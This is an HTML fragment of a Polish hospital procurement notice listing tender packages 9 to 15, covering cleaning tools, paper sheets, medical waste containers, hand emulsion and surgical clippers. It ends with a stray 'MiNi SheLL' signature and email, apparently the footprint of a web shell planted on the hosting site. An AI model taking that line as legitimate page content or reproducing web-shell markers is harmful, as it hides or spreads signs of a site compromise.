<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ściągaczka z gumą do szyb - 35 cm	6 szt
2.Kij do ściągaczki do szyb	6 szt
3.Guma do ściągaczki	20 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Skrobaczka do szyb z rączką - dł ostrza 10 cm	10	szt
2.Ostrza do skrobaczki dł 10 cm	30	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jednorazowe prześcieradło papierowe w rolce szer. 60cm dł 80 m - dwuwarstwowe, gofrowane	312	rolka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> pakiet nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jednorazowe prześcieradło papierowe w rolce szer. 40cm dł 80 m - dwuwarstwowe, gofrowane	36 rolka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> pakiet nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jednorazowy ręcznik papierowe w rolce dwuwarstowy, biały odcinki 25x30	48	rolka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> pakiet nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 0,70 l	4000	szt
2.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 1l	1 000	szt
3.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 2l	5 000	szt
4.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 5l	300	szt
5.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 20l	600	szt
6.Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak mozliwości ponownego otwarcia oraz zamknięcia pojemnika. Na pojemniku widnieje etykieta zawierająca piktogram, którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 30l	600	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena Jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> pakiet nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Emulsja na bazie wosku pszczelego do pielęgnacji wrażliwej, suchej oraz skłonnej do podrażnień skóry rąk personelu medycznego.
Zawierająca w swoim składzie między innymi kompleks witamin C, E, F. Doskonale regeneruje i odżywia podrażnioną i zniszczoną skórę rąk, poprawia naturalną wilgotność i elastyczność skóry, o naturalnym dla skóry pH.Po nałożeniu z łatwością się rozprowadza i bardzo szybko się wchłania, nie pozostawia uczucia lepkości skóry, posiada przyjemny delikatny zapach.
Opakowania 500 ml z pompką dozującą. 300	litr.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena Jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.ostrza do strzygarki zestaw do strzyżenia owłosienia przed zabiegami chirurgicznymi ostrza jednkrotnego uzytku o szerokości 3,8 cm szerokośc brzegu tnącego 30 mm umozliwiające zgodnie z techniką aseptyczną (bezdotykowo) ostrza skonstruowane w sposób wykluczający uszkodzenia skóry,  możliwość usuwania owłosienia z każdej częsci ciała możliwość usuwania włosów krótkich i długich suchych i mokrych nakłądane na główkę strzygarki pakowane w plastikowe przezroczyste opakowanie zaklejone z wierzchu biała folią zawierającą opis oraz nr katalogowy. Pakowane w opakowania zbiorcze po 50 ostrzy	1 000	szt
2.strzygarka z ruchomą głowicą ułatwiającą usuwanie owłosienia z trudno dostępnych okolic ciała: ostrza jednokrotnego uzytku o serokości 3,8 cm : szerokośc brzegu tnącego 30 mm umozliwjające wymanię zgodnie z techniką aseptyczną (dezdotykowo) ostrza skonstruowane w sposób wykluczający uszkodzenia skóry mozliwość usuwania owłosienia z każdej części ciała, możliwosc usuwania włosów krótkich i długich suchych i mokrych zapewniająca minimum 60minut pracy po pełnym naładowaniu baterii bateria typu NIMH kompatybilna ładowarka spełniająca wymogi Dyrektywy 93/42/EEC	250	szt
3.ładowarka do strzygarki	250	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.00-1, 33.76.00.00-5, 39.51.00.00-0, 33.72.12.00-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com